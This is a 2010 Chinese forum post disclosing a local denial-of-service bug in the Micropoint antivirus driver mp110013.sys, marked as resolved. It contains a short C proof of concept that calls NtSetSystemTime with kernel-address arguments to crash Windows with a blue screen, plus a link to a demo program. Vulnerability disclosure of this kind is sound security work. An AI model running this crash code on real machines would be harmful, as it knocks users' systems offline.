点饭的百度空间
银牌会员
积分 2315
发帖 2236
注册 2007-11-30
|
#1 【解决】1:微点mp110013.sys <= 1.3.10123.0 NtSetSystemTimeHook本地拒绝服务漏洞
2010-04-06 19:44
产品版本:微点主动防御:mp.100323.1.2.10581.0278.r1
文件版本:mp110013.sys 1.3.10123.0 timestamp:4BA1863F checksum 1e7b8
问题:不正确地处理NtSetSystemTime的参数,引发本地拒绝服务漏洞
测试程序:http://mj0011.ys168.com 漏洞演示目录下 mpbsod_fun.rar
POC code:
int main(int argc, char* argv[])
{
printf("Micropoint Local D.O.S Vulnerability\n"
"BSOD Micropoint for fun!\n"
"By MJ0011\nth_decoder$126.com\n\nPress Enter...\n");
getchar();
PVOID pAddr = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSetSystemTime");
__asm
{
push 0x80000000
push 0x80000000
call pAddr
}
return 0;
}
[ Last edited by Legend on 2010-4-27 at 13:39 ]
| |
※ ※ ※ 本文纯属【点饭的百度空间】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
你的微笑 is 微点的骄傲!
http://hi.baidu.com/new/micropoint |
|
|
